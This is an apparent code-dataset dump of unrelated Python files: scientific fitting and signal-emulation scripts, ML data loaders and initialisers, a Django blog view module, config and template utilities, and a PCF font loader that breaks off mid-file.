content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
"""
ABOTS: A Bunch Of Tiny Scripts
==============================
The name of this project explains what it is, a bunch of tiny scripts.
I find myself thinking of many different projects that all require some core
functionality that many other projects can share.
However, it must be laid down first before adding the "unique" code that my
ideas consist of.
The usual approach to this issue is using an existing framework someone else
wrote, but then you need to understand how that framework does things and fit
your application to fit that mindset.
As well, you now have this black box in your application that you do not 100%
understand and adds another layer of abstraction that makes debugging issues
that much harder (we all make bugs, so do framework devs).
With that being said, ideologically I do not like using existing frameworks
since that deprives me of the opportunity to learn how that particular piece of
software works.
So ABOTS is my approach of making a shared library of code that I want to use
in other projects.
Any improvements here can then improve my other projects, as well as give me
something small to work on when I am in-between projects that could eventually
be useful later on.
The ideas of these scripts are to be as modular as possible so that they can be
used in a variety of different projects with little changes needed.
Due to the nature of the project, this will probably not be too useful for
other developers who are not me, but it could be useful to see how a particular
component of ABOTS works since the project is optimized more towards
versitlity and simplicity than being the most efficient way of doing something
at the expense of being harder to understand.
Now that you know what lies here, proceed with caution.
You have been warned.
~aewens
""" | python |
from ..mapper import PropertyMapper, ApiInterfaceBase
from ..mapper.types import Timestamp, AnyType
__all__ = ['DismissCard', 'DismissCardInterface']
class DismissCardInterface(ApiInterfaceBase):
card_id: int
image_url: str
title: AnyType
message: AnyType
button_text: AnyType
camera_target: AnyType
face_filter_id: AnyType
class DismissCard(PropertyMapper, DismissCardInterface):
pass
| python |
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 1 15:52:30 2020
@author: liu
"""
NAME = 'FCS'
DESCR = """
This example uses **Pulse Streamer** to emulate signals for fluorescence correlation spectroscopy (FSC).
The example demonstrates autocorrelation measurement with logarithmic binning.
* Channel 1 - fluorescence photons
"""
import random as rnd
def pattFCS(cells, counts, window, time):
cell_period = int(window/cells-time)
photon_period = int(time/counts)
pattern = [(0, 0)]
for c in range(cells):
rnd_counts = rnd.randint(int(0.8*counts), int(1.2*counts))
for i in range(rnd_counts):
pattern.append((3, 1))
tag= rnd.randint(3, int(2*photon_period))
pattern.append((tag, 0))
skip = rnd.randint(3, int(2*cell_period))
pattern.append((skip, 0))
return pattern
def main(pulsestreamer_ip='192.168.178.128'):
""" This is the main function of the example.
Parameters:
pulsestreamer_ip - IP address of the Pulse Streamer.
The default value corresponds to the
direct connection of the Pulse Streamer
to the network card of your PC.
"""
# import API classes into the current namespace
from pulsestreamer import PulseStreamer
# connect to the Pulse Streamer
ps = PulseStreamer(pulsestreamer_ip)
# create a sequence-object
sequence = ps.createSequence()
# parameters for FCS pattern
n_cells = 10
em_counts = 1000
meas_window = 1e9 # in ns, 1s
pass_time = 1e5 # in ns, 100us
# generate new pattern every second and stream
while True:
# generate and assign the pattern to a digital output of PS
patt1 = pattFCS(n_cells, em_counts, meas_window, pass_time)
sequence.setDigital(1, patt1)
ps.stream(sequence, 1)
if __name__ == '__main__':
main() | python |
# ___ _ ___ ___ _ |
# / _ \ __| |_ ___| _ \/ __| | | Create 8-bit-like games!
# | (_) / _| _/ _ \ _/ (_ |_| | Author: Death_Miner
# \___/\__|\__\___/_| \___(_) | Version: 0.4.0
# |
#
# @ octopg/data.py => Handles multiple data files
# We use the JSON format for all data files.
import json
import os
# Current opened files list
files = {}
# Current data of files
d = {}
"""
init()
Loads the required files for the octopg engine
@return void
"""
def init():
# We load the main config file
load_file("config", "data/config.json", "data/config.default.json")
"""
load_file()
Loads a data file and decodes it
@param name (str) The name to use for this file
@param path (str) Path of the data file
@param default_path (str) Path of the default data file
@return void
"""
def load_file(name, path, default_path = None):
global files, d
# Do some debug for the developers
print("- Loading '"+name+"' data file")
print(" => "+path)
# Load only the file once
if name not in files:
# Get the path of the default file
if default_path == None:
# Generate the path of the default data file.
# It should be (original basename)/(original filename).default.(original extension)
default_file = os.path.basename(path).split(".")
default_file.insert(-1, "default")
default_path = os.path.dirname(path) + "/" + ".".join(default_file)
# Check if the config file exists
if os.path.exists(path):
# Open this file
with open(path, "r") as f:
# Decode the JSON file and add it to the data list
d[name] = json.loads(f.read())
# Add the file we want to load to the file list
files[name] = path
# Debug
print("Done.")
# The file doesn't exists, try to open a default config file
elif os.path.exists(default_path):
# Open this file
with open(default_path, "r") as f:
# Decode the JSON file and add it to the data list
d[name] = json.loads(f.read())
# Add the file we want to load to the file list
files[name] = path
# Debug
print("Done.")
# We didn't find any file... Shame!
else:
print("File not found.")
# Show this when file already loaded
else:
print("File already loaded.")
"""
save_file()
Saves a data file
@param name (str) The name of the data file
@return void
"""
def save_file(name):
global files, d
# Do some debug for the developers
print("- Saving '"+name+"' data file")
print(" => "+files[name])
# Check first is file was loaded
if name in files:
# Open the file and write the new JSON encoded data
with open(files[name], "w") as f:
f.write(json.dumps(d[name], sort_keys=True, indent=4))
# Debug
print("Done.")
# The file is not loaded, we can't save it obviously
else:
print("File not loaded.")
"""
close_file()
Saves a data file and close it (removes it from the list)
@param name (str) The name of the data file
@return void
"""
def close_file(name):
global files, d
# Do some debug for the developers
print("- Closing '"+name+"' data file")
# Check first is file was loaded
if name in files:
# Save the file
save_file(name)
# Delete the data & file from memory
del d[name]
del files[name]
# Debug
print("Done.")
# The file is not loaded, we can't close it obviously
else:
print("File not loaded.")
"""
close_all()
Closes all the opened data files
@return void
"""
def close_all():
# list of files to close
to_close = [name for name in files]
# Close them all
for name in to_close:
close_file(name) | python |
__all__ = [
"same"
, "same_attrs"
# Can be used to implement interface of `same`.
# __same__ = same_{implementation}
, "same_vectors"
, "same_sets"
, "same_mappings"
]
from types import (
GeneratorType
)
from six.moves import (
zip_longest
)
from collections import (
Mapping
)
class End(object):
"Allows `same_vectors` to support iterators."
__same__ = lambda *_ : False
end = End
def same_vectors(a, b):
"Recursive. Order sensitive. Complexity is O(min(len(a), len(b)) + 1)."
for ea, eb in zip_longest(a, b, fillvalue = end):
if not same(ea, eb):
return False
return True
def same_sets(a, b):
"Recursive. Ignores order. Complexity is O(len(a) * len(b))."
restb = list(b)
for ea in a:
for i, eb in enumerate(restb):
if same(ea, eb):
del restb[i]
break
else:
return False
return not restb
def same_mappings(a, b):
"Recursive. Ignores order. Complexity is O(min(len(a), len(b)))."
restb = set(b)
for ka in a:
if ka in b:
ea = a[ka]
eb = b[ka]
if same(ea, eb):
restb.remove(ka)
continue
return False
return not restb
def _is_b_iterable(checker):
def wrapper(a, b):
# Iterables or not? See: https://stackoverflow.com/a/1952481/7623015
try:
_ = (e for e in b)
except TypeError:
# This duck does not quack.
return False
return checker(a, b)
wrapper.__doc__ = checker.__doc__
return wrapper
def _is_b_mapping(checker):
def wrapper(a, b):
if isinstance(b, Mapping):
return checker(a, b)
return False
wrapper.__doc__ = checker.__doc__
return wrapper
# Exact type match. Inherited classes must provide __same__.
SAME_ALG = {
dict : _is_b_mapping(same_mappings),
list : _is_b_iterable(same_sets),
set : _is_b_iterable(same_sets),
GeneratorType : _is_b_iterable(same_sets),
tuple : _is_b_iterable(same_vectors)
}
def _l_same_r(l, r):
try:
__same__ = l.__same__
except AttributeError:
return NotImplemented
return __same__(r)
def same(a, b):
""" Compares a and b using `__same__` method.
At least one of the objects must define it.
Else, there are comparators for several standard container types (see below).
If a comparator is absent, base Python comparison mechanism is involved.
Ex.:
class AClass(ItsParent):
def __same__(self, other):
# Look for a semantic difference then return `False`.
return True # NotImplemented (same result as when no `__same__`)
This allows to implement user defined comparison which is not influences
standard Python operation.
E.g. such operators as `==` and `in` (and using objects as keys in hash
based mappings).
I.e. with this suite it is possible to store semantically same objects
inside one mapping because they will appear different for Python.
It allows an object to be changed after it has been used as a key (if
the object also defines custom `__eq__` or `__hash__`).
For the last reason an `id(obj)` expression result can be used as a key.
But it can be quite inconvenient and disallows to obtain the reference
back by its id.
"""
res = _l_same_r(a, b)
if res is NotImplemented:
res = _l_same_r(b, a)
if res is NotImplemented:
try:
alg = SAME_ALG[type(a)]
except KeyError:
try:
alg = SAME_ALG[type(b)]
except KeyError:
# redirect to base Python comparison mechanism
res = a == b
else:
res = alg(b, a)
else:
res = alg(a, b)
return res
same.__doc__ += "\nSupported for those container types:\n\n%s" % ("\n\n".join(
cls.__name__ + "\n " + alg.__doc__ for cls, alg in SAME_ALG.items()
))
def same_attrs(a, b, *attrs):
for name in attrs:
if not same(getattr(a, name), getattr(b, name)):
return False
return True
| python |
from pathlib import Path
from jinja2 import Environment
from jinja2.loaders import BaseLoader
from pathlib import Path
import requests
import json
req = requests.get(r"https://raw.githubusercontent.com/thautwarm/DianaScript-JIT/master/sigs-for-builtin-modules.json")
if req.status_code != 200:
raise IOError("cannot read json spec from remote repo")
SPEC = json.loads(req.text)
env = Environment(
loader = BaseLoader(),
extensions=['jinja2.ext.do'],
trim_blocks=True,
lstrip_blocks=True
)
def find_paths(p: Path):
if not p.is_dir():
if p.suffix == ".in":
yield p
else:
for i in p.iterdir():
if i == p:
continue
yield from find_paths(i)
py_map = {
'Tuple': 'tuple',
'string': 'str'
}
env.filters['each'] = lambda f: lambda seq: map(f, seq)
def assert_(x):
assert x
import builtins
namespace = {**builtins.__dict__, **globals()}
for FROM, TO in [
(path, path.with_suffix("")) for path in find_paths(Path(__file__).parent.parent)
]:
try:
template = env.from_string(FROM.open(encoding='utf8').read())
s = template.render(**namespace)
TO.open('w', encoding='utf8').write(s)
print(TO, "written")
except:
print("error ocurred at", FROM)
raise | python |
import torch
from torch.utils.data import Dataset
import numpy as np
class MNISTGraphDataset(Dataset):
def __init__(self, dataset_path, num_thresholded, train=True, intensities=True, num=-1):
if(train):
dataset_tr = np.loadtxt(dataset_path + 'mnist_train.csv', delimiter=',', dtype=np.float32)
dataset_te = np.loadtxt(dataset_path + 'mnist_test.csv', delimiter=',', dtype=np.float32)
dataset = np.concatenate((dataset_tr, dataset_te), axis=0)
else:
dataset = np.loadtxt(dataset_path + 'mnist_test.csv', delimiter=',', dtype=np.float32)
print("MNIST CSV Loaded")
if isinstance(num, list):
map1 = list(map(lambda x: x in num, dataset[:, 0]))
dataset = dataset[map1]
elif num > -1:
dataset = dataset[dataset[:, 0] == num]
print(dataset.shape)
X_pre = (dataset[:, 1:] - 127.5) / 255.0
imrange = np.linspace(-0.5, 0.5, num=28, endpoint=False)
xs, ys = np.meshgrid(imrange, imrange)
xs = xs.reshape(-1)
ys = ys.reshape(-1)
self.X = np.array(list(map(lambda x: np.array([xs, ys, x]).T, X_pre)))
if(not intensities):
self.X = np.array(list(map(lambda x: x[x[:, 2].argsort()][-num_thresholded:, :2], self.X)))
else:
self.X = np.array(list(map(lambda x: x[x[:, 2].argsort()][-num_thresholded:], self.X)))
self.X = torch.FloatTensor(self.X)
print(self.X.shape)
# print(self.X[0])
print("Data Processed")
def __len__(self):
return len(self.X)
def __getitem__(self, idx):
return self.X[idx]
| python |
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""init weights"""
import math
import numpy as np
from mindspore.common import initializer as init
from mindspore.common.initializer import _assignment
from mindspore.common.initializer import _calculate_correct_fan
from mindspore.common.initializer import _calculate_fan_in_and_fan_out
from mindspore.common.initializer import _calculate_gain
class KaimingUniform(init.Initializer):
"""
Initialize the array with He kaiming algorithm.
Args:
a: the negative slope of the rectifier used after this layer (only
used with ``'leaky_relu'``)
mode: either ``'fan_in'`` (default) or ``'fan_out'``. Choosing ``'fan_in'``
preserves the magnitude of the variance of the weights in the
forward pass. Choosing ``'fan_out'`` preserves the magnitudes in the
backwards pass.
nonlinearity: the non-linear function, recommended to use only with
``'relu'`` or ``'leaky_relu'`` (default).
"""
def __init__(self, a=math.sqrt(5), mode='fan_in', nonlinearity='leaky_relu'):
super().__init__()
self.mode = mode
self.gain = _calculate_gain(nonlinearity, a)
def _initialize(self, arr):
fan = _calculate_correct_fan(arr.shape, self.mode)
bound = math.sqrt(3.0) * self.gain / math.sqrt(fan)
data = np.random.uniform(-bound, bound, arr.shape)
_assignment(arr, data)
class UniformBias(init.Initializer):
"""bias uniform initializer"""
def __init__(self, shape):
super().__init__()
self.shape = shape
def _initialize(self, arr):
fan_in, _ = _calculate_fan_in_and_fan_out(self.shape)
bound = 1 / math.sqrt(fan_in)
data = np.random.uniform(-bound, bound, arr.shape)
_assignment(arr, data)
| python |
from collections import Mapping, Iterable
import copy as copy_
import numpy as np
import datetime as dt
from . import misc
def select_var(d, name, sel):
var_dims = list(d['.'][name]['.dims'])
d['.'][name]['.dims'] = var_dims
for key, value in sel.items():
if isinstance(value, Mapping):
if len(sel) > 1: raise ValueError('invalid selector')
newdim = key
dims = value.keys()
idxs = value.values()
selector = tuple([
idxs[dims.index(var_dim)] if var_dim in dims else slice(None)
for var_dim in var_dims
])
d[name] = d[name][selector]
for dim in dims:
if dim in var_dims:
var_dims.remove(dim)
d['.'][name]['.dims'].append(newdim)
else:
dim, idxs = key, value
idxs = np.array(idxs) if type(idxs) in (list, tuple) else idxs
if isinstance(idxs, np.ndarray) and idxs.dtype == np.bool:
idxs = np.nonzero(idxs)[0]
if dim in var_dims:
i = var_dims.index(dim)
d[name] = np.take(d[name], idxs, axis=i)
if not isinstance(idxs, np.ndarray):
var_dims.remove(dim)
def filter_hidden(x):
if isinstance(x, Mapping):
return {k: v for k, v in x.items() if not k.startswith('.')}
if isinstance(x, Iterable):
return [k for k in x if not k.startswith('.')]
return x
def select(d, sel):
for name in d.keys():
if name.startswith('.'):
continue
select_var(d, name, sel)
def get_dims(d, name=None):
if name is None:
dims = {}
for name in get_vars(d):
data = get_var(d, name)
for i, dim in enumerate(get_dims(d, name)):
dims[dim] = data.shape[i]
return dims
else:
try: return d['.'][name]['.dims']
except KeyError: return gen_dims(d, name)
def get_vars(d):
return filter_hidden(d.keys())
def get_var(d, name):
data = d[name]
if type(data) is np.ndarray:
return data
else:
return np.array(data)
def get_meta(d, name=None):
if name is None:
return d.get('.', {})
else:
try: return d['.'][name]
except KeyError: return {}
def get_attrs(d, name=None):
if name is None:
try: return filter_hidden(d['.']['.'])
except KeyError: return {}
else:
try: return filter_hidden(d['.'][name])
except KeyError: return {}
def gen_dims(d, name):
data = get_var(d, name)
return [name + ('_%d' % i) for i in range(1, data.ndim + 1)]
def parse_time(t):
formats = [
'%Y-%m-%d %H:%M:%S.%f',
'%Y-%m-%d %H:%M:%S',
'%Y-%m-%dT%H:%M:%SZ',
]
for f in formats:
try: return dt.datetime.strptime(t, f)
except: pass
return None
def time_dt(time):
return [parse_time(t) for t in time]
def merge_var(dd, var, dim):
if len(dd) == 0:
return None, None
x0 = dd[0][var]
meta0 = dd[0]['.'][var]
dims0 = meta0['.dims']
meta = copy_.deepcopy(meta0)
if dim in dims0:
i = dims0.index(dim)
x = np.concatenate(
[d[var] for d in dd if d['.'][var]['.dims'] == dims0],
axis=i
)
else:
meta['.dims'] = [dim] + list(meta['.dims'])
x = np.stack([d[var] for d in dd if d['.'][var]['.dims'] == dims0])
return x, meta
def merge(dd, dim, new=None, variables=None):
dx = {'.': {'.': {}}}
vars_ = list(set([x for d in dd for x in get_vars(d)]))
dims = [k for d in dd for k in get_dims(d).keys()]
is_new = dim not in dims
for var in vars_:
var_dims = get_dims(dd[0], var)
if is_new and (variables is None or var in variables) or \
dim in var_dims:
x, meta = merge_var(dd, var, dim)
elif new is not None and (variables is None or var in variables):
x, meta = merge_var(dd, var, new)
else:
x, meta = dd[0][var], dd[0]['.'][var]
dx[var] = x
dx['.'][var] = meta
for d in dd:
if '.' in d['.']:
dx['.']['.'].update(d['.']['.'])
return dx
def rename_dim(d, old, new):
if old == new:
return
if '.' in d:
for var in d['.'].keys():
meta = d['.'][var]
if '.dims' in d['.'][var]:
dims = d['.'][var]['.dims']
for i, dim in enumerate(dims):
if dim == old:
dims[i] = new
def rename(d, old, new):
if old == new:
return
if old in d:
d[new] = d[old]
d['.'][new] = d['.'][old]
del d[old]
del d['.'][old]
rename_dim(d, old, new)
def copy(d):
d2 = {}
for var in get_vars(d):
d2[var] = d[var]
d2['.'] = copy_.deepcopy(d['.'])
return d2
def group_by(d, dim, group, func):
groups = sorted(list(set(group)))
vars = get_vars(d)
n = len(groups)
for var in vars:
dims = d['.'][var]['.dims']
try:
i = dims.index(dim)
except ValueError:
continue
size = list(d[var].shape)
size[i] = n
x = np.empty(size, d[var].dtype)
for j, g in enumerate(groups):
mask = group == g
slice_x = misc.sel_slice({dim: j}, dims)
slice_y = misc.sel_slice({dim: mask}, dims)
y = d[var][slice_y]
x[slice_x] = func(y, axis=i)
d[var] = x
| python |
import json
import os
from typing import Callable
import imageio
import numpy as np
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import pathlib
import torch
from torchvision import datasets, transforms
from torchvision.datasets.mnist import read_label_file, read_image_file
from args import args
def clearline():
CURSOR_UP_ONE = "\x1b[1A"
ERASE_LINE = "\x1b[2K"
print(CURSOR_UP_ONE + ERASE_LINE + CURSOR_UP_ONE)
def input2label(x: torch.Tensor) -> torch.LongTensor:
"""
- Convert a torch array containing floats to contain ints
- The continuous values of 'x' are binned based on n_bins set at args.py
- This will turn our problem of predicting the next pixel value to
a classification problem (instead of regression)
"""
return torch.squeeze(torch.round((args.n_bins - 1) * x).type(torch.LongTensor), 1)
def tile_images(images: np.array, n_rows=0) -> np.array:
n_images = len(images)
height = images[0].shape[1]
width = images[0].shape[2]
if n_rows == 0:
n_rows = int(np.floor(np.sqrt(n_images)))
while n_images % n_rows != 0:
n_rows -= 1
n_cols = n_images // n_rows
images = np.squeeze(np.array(images), axis=1)
images = np.transpose(images, (1, 2, 0))
images = np.reshape(images, [height, width, n_rows, n_cols])
images = np.transpose(images, (2, 3, 0, 1))
images = np.concatenate(images, 1)
images = np.concatenate(images, 1)
return images
def plot_stats(stats, savepath: str) -> None:
"""
Make all the plots in stats. Stats can be a dict or a path to json (str)
"""
if type(stats) is str:
assert os.path.isfile(stats)
with open(stats, "r") as sf:
stats = json.load(sf)
assert type(stats) is dict, "stats must be a dictionary"
if not os.path.isdir(savepath):
os.makedirs(savepath)
def _plot(y, title):
plt.Figure()
if type(y) is list:
plt.plot(range(1, len(y) + 1), y)
elif type(y) is dict:
for key, z in y.items():
plt.plot(range(1, len(z) + 1), z, label=key)
plt.legend()
else:
raise ValueError
plt.xlabel("Epoch")
plt.ylabel(title)
plt.title(title)
plt.savefig(os.path.join(savepath, title.replace(" ", "_") + ".png"))
plt.close()
# Loop over stats dict and plot. Dicts within stats get plotted together.
for key, value in stats.items():
_plot(value, key)
def get_label2onehot(n_classes: int) -> Callable:
def label2onehot(target_class_index):
one_hot_vector = np.zeros((n_classes), dtype="float32")
one_hot_vector[target_class_index] = 1
return one_hot_vector
return label2onehot
def augment(rotate=5):
return transforms.Compose(
[transforms.RandomRotation(rotate), transforms.ToTensor()]
)
def data_loader(dataset, batch_size, n_workers=8):
assert dataset.lower() in ["mnist", "fashionmnist"]
loader_args = {
"batch_size": batch_size,
"num_workers": n_workers,
"pin_memory": True,
}
datapath = os.path.join(os.getenv("HOME"), "data", dataset.lower())
dataset_args = {
"root": datapath,
"download": True,
"transform": transforms.ToTensor(),
}
if dataset.lower() == "mnist":
dataset_init = datasets.MNIST
n_classes = 10
else:
dataset_init = datasets.FashionMNIST
n_classes = 10
label2onehot = get_label2onehot(n_classes)
dataset_args.update({"target_transform": label2onehot})
val_loader = torch.utils.data.DataLoader(
dataset_init(train=False, **dataset_args), shuffle=False, **loader_args
)
dataset_args["transform"] = augment()
train_loader = torch.utils.data.DataLoader(
dataset_init(train=True, **dataset_args), shuffle=True, **loader_args
)
return train_loader, val_loader, label2onehot, n_classes
| python |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render,redirect
from django.http import HttpResponse
from .models import Blogs
from .forms import Create
def add_blog(request):
if request.method == "POST":
addBlog = Create(request.POST, request.FILES)
if addBlog.is_valid():
addBlog.save()
return redirect('blog:blogHome')
else:
addBlog = Create()
return render(request, 'blog/create.html', {'addBlog':addBlog})
def blogHome(request):
blogs = Blogs.objects.all().order_by('date')
return render(request, 'blog/blogHome.html', {'blogs':blogs})
def blog_detail(request,slug):
blog = Blogs.objects.get(slug=slug)
return render(request, 'blog/blog_detail.html', {'blog':blog})
def delete_blog(request, slug):
delBlog = Blogs.objects.filter(slug=slug).delete()
return redirect('blog:blogHome')
| python |
###############################################################################
# Copyright (c) 2007-2018, National Research Foundation (Square Kilometre Array)
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use
# this file except in compliance with the License. You may obtain a copy
# of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
"""Linear least-squares fitter.
:author: Ludwig Schwardt
:license: Modified BSD
"""
from __future__ import division
import warnings
import numpy as np
from .generic import ScatterFit, NotFittedError
# ----------------------------------------------------------------------------------------------------------------------
# --- CLASS : LinearLeastSquaresFit
# ----------------------------------------------------------------------------------------------------------------------
class LinearLeastSquaresFit(ScatterFit):
r"""Fit linear regression model to data using the SVD.
This fits a linear function of the form :math:`y = p^T x` to a sequence of
N P-dimensional input vectors :math:`x` and a corresponding sequence of N
output measurements :math:`y`. The input to the fitter is presented as an
input *design matrix* :math:`X` of shape (P, N) and an N-dimensional output
*measurement vector* :math:`y`. The P-dimensional *parameter vector*
:math:`p` is determined by the fitting procedure. The fitter can use
uncertainties on the `y` measurements and also produces a covariance matrix
for the parameters. The number of parameters, P, is determined by the shape
of :math:`X` when :meth:`fit` is called.
Parameters
----------
rcond : float or None, optional
Relative condition number of the fit. Singular values smaller than this
relative to the largest singular value will be ignored. The default
value is N * eps, where eps is the relative precision of the float
type, about 2e-16 in most cases, and N is length of output vector `y`.
Attributes
----------
params : array of float, shape (P,)
Fitted parameter vector
cov_params : array of float, shape (P, P)
Standard covariance matrix of parameters
Notes
-----
The :meth:`fit` method finds the optimal parameter vector :math:`p` that
minimises the sum of squared weighted residuals, given by
.. math:: \chi^2 = \sum_{i=1}^N \left[\frac{y_i - \sum_{j=1}^P p_j x_{ji}}{\sigma_i}\right]^2
where :math:`x_{ji}` are the elements of the design matrix :math:`X` and
:math:`\sigma_i` is the uncertainty associated with measurement
:math:`y_i`. The problem is solved using the singular-value decomposition
(SVD) of the design matrix, based on the description in Section 15.4 of
[1]_. This gives the same parameter solution as the NumPy function
:func:`numpy.linalg.lstsq`, but also provides the covariance matrix of the
parameters.
.. [1] Press, Teukolsky, Vetterling, Flannery, "Numerical Recipes in C,"
Second Edition, 1992.
"""
def __init__(self, rcond=None):
ScatterFit.__init__(self)
self.rcond = rcond
self.params = None
self.cov_params = None
def fit(self, x, y, std_y=1.0):
"""Fit linear regression model to x-y data using the SVD.
Parameters
----------
x : array-like, shape (P, N)
Known input values as design matrix (one row per desired parameter)
y : array-like, shape (N,)
Known output measurements as sequence or numpy array
std_y : float or array-like, shape (N,), optional
Measurement error or uncertainty of `y` values, expressed as
standard deviation in units of `y`
Returns
-------
self : :class:`LinearLeastSquaresFit` object
Reference to self, to allow chaining of method calls
"""
x = np.atleast_2d(np.asarray(x))
y = np.atleast_1d(np.asarray(y))
# Convert uncertainty into array of shape (N,)
if np.isscalar(std_y):
std_y = np.tile(std_y, y.shape)
std_y = np.atleast_1d(np.asarray(std_y))
# Lower bound on uncertainty is determined by floating-point
# resolution (no upper bound)
np.clip(std_y, max(np.mean(np.abs(y)), 1e-20) * np.finfo(y.dtype).eps,
np.inf, out=std_y)
# Normalise uncertainty to avoid numerical blow-up
# (only relative uncertainty matters for parameter solution)
max_std_y = std_y.max()
std_y /= max_std_y
# Weight design matrix columns and output vector by `y` uncertainty
A = x / std_y[np.newaxis, :]
b = y / std_y
# Perform SVD on A, which is transpose of usual design matrix -
# let A^T = Ur S V^T to correspond with NRinC
# Shapes: A ~ PxN, b ~ N, V ~ PxP, s ~ P, S = diag(s) ~ PxP,
# "reduced U" Ur ~ NxP and Urt = Ur^T ~ PxN
V, s, Urt = np.linalg.svd(A, full_matrices=False)
# Set all "small" singular values below this relative cutoff equal to 0
s_cutoff = (len(x) * np.finfo(x.dtype).eps * s[0]
if self.rcond is None else self.rcond * s[0])
# Warn if the effective rank < P
# (i.e. some singular values are considered to be zero)
if np.any(s < s_cutoff):
warnings.warn('Least-squares fit may be poorly conditioned')
# Invert zero singular values to infinity, as we are actually
# interested in reciprocal of s, and zero singular values should be
# replaced by zero reciprocal values a la pseudo-inverse
s[s < s_cutoff] = np.inf
# Solve linear least-squares problem using SVD
# (see NRinC, 2nd ed, Eq. 15.4.17)
# In matrix form: p = V S^(-1) Ur^T b = Vs Ur^T b, where Vs = V S^(-1)
Vs = V / s[np.newaxis, :]
self.params = np.dot(Vs, np.dot(Urt, b))
# Also obtain covariance matrix of parameters
# (see NRinC, 2nd ed, Eq. 15.4.20)
# In matrix form: Cp = V S^(-2) V^T = Vs Vs^T
# (also rescaling with max std_y)
self.cov_params = np.dot(Vs, Vs.T) * (max_std_y ** 2)
return self
def __call__(self, x, full_output=False):
"""Evaluate linear regression model on new x data.
Parameters
----------
x : array-like, shape (P, M)
New input values as design matrix (one row per fitted parameter)
full_output : {False, True}, optional
True if output uncertainty should also be returned
Returns
-------
y : array, shape (M,)
Corresponding output of function as a numpy array
std_y : array, shape (M,), optional
Uncertainty of function output, expressed as standard deviation
"""
if (self.params is None) or (self.cov_params is None):
raise NotFittedError("Linear regression model not fitted to data "
"yet - first call .fit method")
A = np.atleast_2d(np.asarray(x))
y = np.dot(self.params, A)
if full_output:
return y, np.sqrt(np.sum(A * np.dot(self.cov_params, A), axis=0))
else:
return y
| python |
from typing import Sequence
from deeppavlov.models.tokenizers.utils import detokenize
from core.state_schema import Dialog
from annotators.person.person_normalizer import PersonNormalizer
class DefaultPostprocessor:
def __init__(self) -> None:
self.person_normalizer = PersonNormalizer(per_tag='PER')
def __call__(self, dialogs: Sequence[Dialog]) -> Sequence[str]:
new_responses = []
for d in dialogs:
# get tokens & tags
response = d['utterances'][-1]
ner_annotations = response['annotations']['ner']
user_name = d['user']['profile']['name']
# replace names with user name
if ner_annotations and (response['active_skill'] == 'chitchat'):
response_toks_norm, _ = \
self.person_normalizer([ner_annotations['tokens']],
[ner_annotations['tags']],
[user_name])
response_toks_norm = response_toks_norm[0]
# detokenize
new_responses.append(detokenize(response_toks_norm))
else:
new_responses.append(response['text'])
return new_responses
| python |
# SPDX-FileCopyrightText: 2020 Jeff Epler for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`adafruit_bitmap_font.pcf`
====================================================
Loads PCF format fonts.
* Author(s): Jeff Epler
Implementation Notes
--------------------
**Hardware:**
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
from collections import namedtuple
import gc
import struct
from fontio import Glyph
from .glyph_cache import GlyphCache
_PCF_PROPERTIES = 1 << 0
_PCF_ACCELERATORS = 1 << 1
_PCF_METRICS = 1 << 2
_PCF_BITMAPS = 1 << 3
_PCF_INK_METRICS = 1 << 4
_PCF_BDF_ENCODINGS = 1 << 5
_PCF_SWIDTHS = 1 << 6
_PCF_GLYPH_NAMES = 1 << 7
_PCF_BDF_ACCELERATORS = 1 << 8
_PCF_DEFAULT_FORMAT = 0x00000000
_PCF_INKBOUNDS = 0x00000200
_PCF_ACCEL_W_INKBOUNDS = 0x00000100
_PCF_COMPRESSED_METRICS = 0x00000100
_PCF_GLYPH_PAD_MASK = 3 << 0 # See the bitmap table for explanation */
_PCF_BYTE_MASK = 1 << 2 # If set then Most Sig Byte First */
_PCF_BIT_MASK = 1 << 3 # If set then Most Sig Bit First */
_PCF_SCAN_UNIT_MASK = 3 << 4
# https://fontforge.org/docs/techref/pcf-format.html
Table = namedtuple("Table", ("format", "size", "offset"))
Metrics = namedtuple(
"Metrics",
(
"left_side_bearing",
"right_side_bearing",
"character_width",
"character_ascent",
"character_descent",
"character_attributes",
),
)
Accelerators = namedtuple(
"Accelerators",
(
"no_overlap",
"constant_metrics",
"terminal_font",
"constant_width",
"ink_inside",
"ink_metrics",
"draw_direction",
"font_ascent",
"font_descent",
"max_overlap",
"minbounds",
"maxbounds",
"ink_minbounds",
"ink_maxbounds",
),
)
Encoding = namedtuple(
"Encoding", ("min_byte2", "max_byte2", "min_byte1", "max_byte1", "default_char")
)
Bitmap = namedtuple("Bitmap", ("glyph_count", "bitmap_sizes"))
class PCF(GlyphCache):
"""Loads glyphs from a PCF file in the given bitmap_class."""
def __init__(self, f, bitmap_class):
super().__init__()
self.file = f
self.name = f
f.seek(0)
self.buffer = bytearray(1)
self.bitmap_class = bitmap_class
_, table_count = self._read("<4sI")
self.tables = {}
for _ in range(table_count):
type_, format_, size, offset = self._read("<IIII")
self.tables[type_] = Table(format_, size, offset)
bitmap_format = self.tables[_PCF_BITMAPS].format
if bitmap_format != 0xE:
raise NotImplementedError("Unsupported format %s" % bitmap_format)
self._accel = self._read_accelerator_tables()
self._encoding = self._read_encoding_table()
self._bitmaps = self._read_bitmap_table()
self._ascent = self._accel.font_ascent
self._descent = self._accel.font_descent
minbounds = self._accel.ink_minbounds
maxbounds = self._accel.ink_maxbounds
width = maxbounds.right_side_bearing - minbounds.left_side_bearing
height = maxbounds.character_ascent + maxbounds.character_descent
self._bounding_box = (
width,
height,
